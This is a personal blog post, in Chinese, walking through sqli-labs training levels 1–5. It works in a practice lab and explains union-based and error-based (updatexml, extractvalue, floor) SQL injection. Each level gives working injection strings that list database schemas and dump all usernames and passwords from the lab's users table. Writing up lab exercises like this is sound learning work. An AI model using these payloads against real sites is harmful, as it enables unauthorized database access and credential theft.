<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl"/>
  
  
  
  
  <title>Sqlilabs靶场1-5 | baba童鞋的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="知识点  查数据库名：select database()information_schema.tables：存储mysql数据库下面的所有表名信息的表table_schema：数据库名table_name：表名column_name：列名information_schema.columns ：存储mysql数据库下面的所有列名信息的表table_name：表名–+：表示注释，目的是把字符数据的后一">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqlilabs靶场1-5">
<meta property="og:url" content="http://example.com/2021/02/01/bachang/index.html">
<meta property="og:site_name" content="baba童鞋的博客">
<meta property="og:description" content="知识点  查数据库名：select database()information_schema.tables：存储mysql数据库下面的所有表名信息的表table_schema：数据库名table_name：表名column_name：列名information_schema.columns ：存储mysql数据库下面的所有列名信息的表table_name：表名–+：表示注释，目的是把字符数据的后一">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh0.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh1.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh2.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh3.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh4.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh5.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh6.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh7.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh8.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh9.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/oh10.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/eee1.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/eee2.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/eee3.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/eee4.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/a0.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/a1.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/a2.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/a3.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/b1.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/b2.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/b3.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/b4.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/q1.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/q2.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/q3.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/q4.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/q5.png">
<meta property="og:image" content="http://example.com/2021/02/01/bachang/bbb.png">
<meta property="article:published_time" content="2021-02-01T06:24:18.000Z">
<meta property="article:modified_time" content="2021-02-01T09:19:28.428Z">
<meta property="article:author" content="Jialu">
<meta property="article:tag" content="ctf web 霸霸">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/02/01/bachang/oh0.png">
  
    <link rel="alternative" href="/atom.xml" title="baba童鞋的博客" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/ljl.jpg">
  
  
  
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
<meta name="generator" content="Hexo 5.2.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

        <a href="/" class="profilepic">
            
            <img lazy-src="/img/ljl.jpg" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder="搜索一下" autocomplete="off">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a  href="/archives/">我的心血，快来cue</a></li>
                        
                            <li><a  href="/categories/xz">肖战和我</a></li>
                        
                            <li><a  href="/cql/cql">那年夏天~</a></li>
                        
                            <li><a  href="/about/index">关于老公老婆的那些事~</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github"  target="_blank" href="/xxxxx" title="github">github</a>
                            
                                <a class="fl weibo"  target="_blank" href="/xxxxxxxx" title="weibo">weibo</a>
                            
                                <a class="fl rss"  target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        
                    </div>
                </section>
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://blog.csdn.net/baidu_21483933">csdn</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="https://segmentfault.com/blog/maocg_web">segmentfault</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.jianshu.com/users/eb37ef89c746/latest_articles">简书</a>
                    
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">爱动漫,爱游戏,爱编程,爱运动,爱的太多了!</div>
                </section>
                
            </div>
        </div>
    </header>
</div>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1817967046&auto=1&height=66"></iframe>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/ljl.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/archives/">我的心血，快来cue</a></li>
                
                    <li><a href="/categories/xz">肖战和我</a></li>
                
                    <li><a href="/cql/cql">那年夏天~</a></li>
                
                    <li><a href="/about/index">关于老公老婆的那些事~</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="/xxxxx" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="/xxxxxxxx" title="weibo">weibo</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                </div>
            </nav>
        </header>
    </div>
</nav>
      <div class="body-wrap"><article id="post-bachang" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a  href="/2021/02/01/bachang/" class="article-date">
      <time datetime="2021-02-01T06:24:18.000Z" itemprop="datePublished">2021-02-01</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Sqlilabs靶场1-5
    </h1>
  


      </header>
      
      <div class="article-info article-info-post">
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h1>知识点</h1>

<p>查数据库名：select database()<br>information_schema.tables：存储mysql数据库下面的所有表名信息的表<br>table_schema：数据库名<br>table_name：表名<br>column_name：列名<br>information_schema.columns ：存储mysql数据库下面的所有列名信息的表<br>table_name：表名<br>–+：表示注释，目的是把字符数据的后一个单引号及后面的语句注释掉，以免影响<br>group_concat函数：它将相同行的指定列的数据连在一起，如果不用该函数，只能显示一个数据，满足不了我们的需求，所以用group_concat函数将所有数据显示</p>
<h1>Less-1</h1>
<h4>界面：</h4>

<p><img src="/2021/02/01/bachang/oh0.png"></p>
<h4>测试：</h4>

<p><b style="color:red">1、</b> url + ?id=1<br><img src="/2021/02/01/bachang/oh1.png"><br>回显正常，说明不是数字型注入<br><b style="color:red">2、</b> url + ?id=1’<br><img src="/2021/02/01/bachang/oh2.png"><br>回显报错，说明是字符型注入<br><b style="color:red">3、</b> url + ?id=1’ or ‘1’=’1<br><img src="/2021/02/01/bachang/oh3.png"><br>回显正常，单引号闭合成功，通过单引号闭合进行注入<br><b style="color:red">4、</b>进行测试：</p>
<ul>
<li>url + ?id=1' order by 3--+ 
<br>//回显正常
</li><li>url + ?id=1' order by 4--+
<br>//报错："Unknown column '4' in 'order clause'"
</li></ul>

<p><img src="/2021/02/01/bachang/oh4.png"><br>通过逐个测试，得出字段数为3，进行联合注入<br><b style="color:red">5、</b>查看回显的字段：<br>url + ?id=-1’ union select 1,2,3 –+<br>//得到可以回显的字段：2,3字段<br><img src="/2021/02/01/bachang/oh5.png"><br>url + ?id=-1’ union select 1,database(),3 –+<br>//得到字段2所对应的数据库名为security<br><img src="/2021/02/01/bachang/oh6.png"><br><b style="color:red">6、</b>查看所有数据库名：<br>url + ?id=-1’ union select 1,<br>(select group_concat(schema_name) from information_schema.schemata),3 –+<br><img src="/2021/02/01/bachang/oh7.png"><br><b style="color:red">7、</b>查看security库内的所有表名：<br>url + ?id=-1’ union select 1,<br>(select group_concat(table_name) from information_schema.tables where table_schema=’security’),3 –+<br><img src="/2021/02/01/bachang/oh8.png"><br><b style="color:red">8、</b>爆出users表中的列名：<br>url + ?id=-1’ union select 1,<br>(select group_concat(column_name) from information_schema.columns where table_name=’users’),3 –+<br><img src="/2021/02/01/bachang/oh9.png"><br>有用户名和密码<br><b style="color:red">9、</b>爆破用户名和密码：<br>url + ?id=-1’ union select 1,<br>(select group_concat(password) from security.users),(select group_concat(username) from security.users) –+<br><img src="/2021/02/01/bachang/oh10.png"><br>得到所有的用户名和密码</p>
<h1>Less-2</h1>

<h4>界面：</h4>

<p><img src="/2021/02/01/bachang/eee1.png"><br>进行测试，结果如下：<br><img src="/2021/02/01/bachang/eee2.png"><br>发现属于数字型注入，不需要进行闭合，直接进行注入<br>同Less-1一样，通过构造?id=-1 order by 1/2/3/4来得出字段数为3<br>构造?id=1 and 1=2 union select 1,2,3 或者 ?id=-1 union select 1,2,3来判断回显字段：<br><img src="/2021/02/01/bachang/eee3.png"><br>回显字段和Less-1一样是2和3<br>//其他步骤同Less-1类似，只是id=-1后没有加’</p>
<h4>最终payload：</h4>

<p>?id=-1 union select 1,<br>(select group_concat(password) from security.users),(select group_concat(username) from security.users) –+<br><img src="/2021/02/01/bachang/eee4.png"><br>得到所有用户名和密码</p>
<h1>Less-3</h1>
<h4>界面</h4>

<p><img src="/2021/02/01/bachang/a0.png"></p>
<h4>测试：</h4>

<p>单引号与括号闭合</p>
<ul>
<li>url + ?id=1
//回显正常
</li><li>url + ?id=1'
//You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
</li><li>url + ?id=1') --+
//回显正常
</li></ul>

<p>构造?id=1’) order by 1/2/3/4–+ 获得字段数3<br><img src="/2021/02/01/bachang/a1.png"><br>构造：?id=-1) union select 1,2,3–+<br><img src="/2021/02/01/bachang/a2.png"><br>回显字段依然是2和3<br>其余步骤依然与Less-1类似，只需将id=1’改成id=-1’)</p>
<h4>最终payload：</h4>

<p>?id=-1’) union select 1,<br>(select group_concat(password) from security.users),(select group_concat(username) from security.users)–+<br><img src="/2021/02/01/bachang/a3.png"><br>得到所有用户名和密码！</p>
<h1>Less-4</h1>
<h4>界面</h4>

<p><img src="/2021/02/01/bachang/b1.png"></p>
<h4>测试：</h4>

<p>先提交1，成功回显，在提交1’,回显成功，提交1’’,报错<br><img src="/2021/02/01/bachang/b2.png"><br>双引号和括号闭合</p>
<ul>
<li>url + ?id=1") --+
//闭合成功
</li><li>url + ?id=1") order by 1/2/3/4--+
//得到字段数3
</li><li>url + ?id=-1") union select 1,2,3--+</li>
<img src="/2021/02/01/bachang/b3.png">
<br>//进行联合注入,得到回显字段
</ul>

<p>其余步骤依然与Less-1类似，只需将id=1’改成id=-1”)</p>
<h4>最终payload</h4>

<p>url + ?id=-1’) union select 1,<br>(select group_concat(password) from security.users),(select group_concat(username) from security.users)–+<br><img src="/2021/02/01/bachang/b4.png"><br>得到所有用户名和密码~</p>
<h1>Less-5</h1>
<h4>界面：</h4>

<p><img src="/2021/02/01/bachang/q1.png"></p>
<h4>测试：</h4>

<p><b style="color:blue">###1、</b>逐个测试</p>
<ul>
<li>?id=1
//回显：You are in..........
</li><li>?id=1'
//回显：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
</li></ul>

<p>构造：?id=1’ order by 3–+ 来确认字段数量<br><b style="color:blue">###2、</b>获取数据库名<br>法一：通过updatexml报错注入：</p>
<ul>
<li>?id=1' and 1=(updatexml(1,concat(0x3a,(select database())),1))%23
</li></ul>
法二：通过floor报错注入：
<ul>
<li>?id=1' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+
</li></ul>

<p>可以知道数据库名为：security<br><img src="/2021/02/01/bachang/q2.png"><br><b style="color:blue">###3、</b>获取security数据库的表名</p>
<ul>
<li>?id=1' and updatexml('~',concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),'~')--+
</li></ul>

<p><img src="/2021/02/01/bachang/q3.png"><br><b style="color:blue">###4、</b>查询users表内的字段名</p>
<ul>
<li>?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,32)))--+
</li></ul>

<p><img src="/2021/02/01/bachang/q4.png"></p>
<p><b style="color:blue">###5、</b>查询users表内的字段数据</p>
<ul>
<li>?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(username,0x3a,password) from users),1,32)))--+
</li></ul>

<p><img src="/2021/02/01/bachang/q5.png"><br>啊~好累的一天<br><img src="/2021/02/01/bachang/bbb.png"></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a  href="/2021/02/01/bachang/">Sqlilabs靶场1-5</a></p>
        <p><span>文章作者:</span><a  href="/" title="访问  的个人博客"></a></p>
        <p><span>发布时间:</span>2021年02月01日 - 14时24分</p>
        <p><span>最后更新:</span>2021年02月01日 - 17时19分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2021/02/01/bachang/" title="Sqlilabs靶场1-5">http://example.com/2021/02/01/bachang/</a>
            <span class="copy-path" data-clipboard-text="原文: http://example.com/2021/02/01/bachang/　　作者: " title=""></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a  href="/2021/02/03/buy/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          18-Buu练习[极客大挑战 2019]BuyFlag
        
      </div>
    </a>
  
  
    <a  href="/2021/01/31/baby/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">17-Buu练习baby Sql</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">知识点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">Less-1</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">2.0.0.1.</span> <span class="toc-text">界面：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">2.0.0.2.</span> <span class="toc-text">测试：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">3.</span> <span class="toc-text">Less-2</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">3.0.0.1.</span> <span class="toc-text">界面：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">3.0.0.2.</span> <span class="toc-text">最终payload：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">4.</span> <span class="toc-text">Less-3</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.0.0.1.</span> <span class="toc-text">界面</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.0.0.2.</span> <span class="toc-text">测试：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.0.0.3.</span> <span class="toc-text">最终payload：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">5.</span> <span class="toc-text">Less-4</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">5.0.0.1.</span> <span class="toc-text">界面</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">5.0.0.2.</span> <span class="toc-text">测试：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">5.0.0.3.</span> <span class="toc-text">最终payload</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">6.</span> <span class="toc-text">Less-5</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">6.0.0.1.</span> <span class="toc-text">界面：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">6.0.0.2.</span> <span class="toc-text">测试：</span></a></li></ol></li></ol></li></ol></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>




<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <section class="changyan" id="comments">
  <!--<div id="uyan_frame"></div>-->
  <div id="SOHUCS"></div>
  <script charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/changyan.js"></script>
  <script type="text/javascript">
    window.changyan.api.config({
      appid: 'xxxx',
      conf: 'xxxxxxxxx'
    });
  </script>
</section>
    



    <div class="scroll" id="post-nav-button">
        
            <a  href="/2021/02/03/buy/" title="上一篇: 18-Buu练习[极客大挑战 2019]BuyFlag">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a  href="/2021/01/31/baby/" title="下一篇: 17-Buu练习baby Sql">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/05/02/key/">网络安全实验室基础篇</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/28/math/">Love Math</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/23/bgrc/">日常练习[BJDCTF2020]ZJCTF，不过如此</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/18/lo/">日常buu练习(.htaccess文件上传漏洞)</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/16/p/">日常练习[MRCTF2020]Ez_bypass</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/15/zhishidian/">Web常见知识点总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/15/tuzi/">攻防世界练习</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/08/ci/">buu练习[GKCTF2020]CheckIN</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/07/pig/">练习-[BJDCTF 2nd]假猪套天下第一 73</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/06/ssti/">SSTI注入&&[BJDCTF2020]The Mystery of Ip 1</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/05/daima/">Buu练习[强网杯 2019]高明的黑客</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/01/b/">任意下载漏洞&&[RoarCTF 2019]Easy Java 1</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/31/xxs/">Ctf Xss利用_xss总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/30/pop/">Pop链->[MRCTF2020]ezpop</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/fxl/">Php反序列化--->魔法函数</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/20/gj/">Web步骤</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/18/zj/">CSRF</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/13/web/">攻防世界练习</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/10/fan/">反序列化&Web信息搜集知识点总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/26/mz/">Sqli-Labs靶场8-10</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/22/bc/">Sqli-Labs靶场6-7</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/15/hack/">25-buu练习[BJDCTF 2nd]old-Hack 1</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/14/guge/">24-buu练习[BJDCTF 2nd]fake Google 1</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/12/list/">23-buu练习[GYCTF2020]Blacklist</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/10/baby-1/">22-buu练习[GXYCTF2019]BabySQli</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/08/ssrf/">21-Buu练习[网鼎杯 2018]Fakebook（ssrf漏洞）</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/07/zip/">20-Buu练习[极客大挑战 2019]PHP1</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/05/nizhuansiwei/">19-buu练习[ZJCTF 2019]NiZhuanSiWei</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/03/buy/">18-Buu练习[极客大挑战 2019]BuyFlag</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/01/bachang/">Sqlilabs靶场1-5</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/31/baby/">17-Buu练习baby Sql</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/30/suibianzhu/">16-Buu练习[强网杯 2019]随便注</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/29/cat/">15-Buu练习have Fun</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/28/shell/">14-buu练习Knife</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/27/txt/">13-Buu练习easy_tornado</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/26/clac/">12-buu练习Easy Clac</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/25/love/">11-Buu练习lovesql</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/24/sql/">10-buu练习EasySQL2</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/23/mdwu/">9-buu练习Easy MD5</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/22/bak/">8-buu练习[ACTF2020 新生赛]BackupFile</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/21/hhh/">7-Buu练习[极客大挑战 2019]Http</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/20/exec/">6-buu练习[ACTF2020 新生赛]Exec</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/19/ping/">5-buu练习Ping Ping Ping</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/18/bu/">4-buu练习EasySQL1</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/17/buu/">3-buu练习Secret File</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/16/include1/">2-buu[ACTF2020 新生赛]Include</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/15/phpshenji/">1-Php审计buu第一题</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/15/php%E9%9D%B6%E5%9C%BA/">Sqlilabs靶场的搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/04/php/">Phpstudy的使用-站点的创建</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/04/weixieyi/">伪协议Wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/02/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/">Php伪协议笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/30/bugku/">日常小练</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/28/html/">Html</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/27/php%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%962/">Php变量覆盖2</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/26/basic-rce2/">basic.rce2</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/24/php%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%961/">被摧残的第二天</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/23/basic-rce1/">Baba童鞋的web第一天记录</a></li><li class="post-list-item"><a class="post-list-link" 